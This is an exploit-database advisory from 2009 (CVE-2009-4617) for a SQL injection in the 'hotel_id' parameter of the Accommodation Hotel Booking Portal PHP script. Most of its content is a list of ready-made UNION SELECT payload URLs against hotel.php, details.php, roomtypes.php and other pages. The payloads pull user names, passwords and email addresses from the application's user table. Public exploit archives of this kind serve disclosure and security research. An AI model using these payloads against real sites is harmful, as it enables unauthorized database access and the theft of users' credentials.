Accommodation Hotel Booking Portal - 'hotel_id' SQL Injection

Author: Mr.SQL
type: webapps
platform: php
port: 
date_added: 2009-09-09  
date_updated:   
verified: 1  
codes: OSVDB-61842;CVE-2009-4617;OSVDB-61841;OSVDB-61840;OSVDB-61839;OSVDB-61838;OSVDB-57965;OSVDB-57964;OSVDB-57963  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9632.txt  

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( hotel.php hotel_id )
##
## Accommodation Hotel Booking Portal
##
## http://www.tourismscripts.com
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/photos.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/map.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/weather.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/reviews.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/book.php?hotel_id=1' << SQL >>
##
########################
########################

# milw0rm.com [2009-09-10]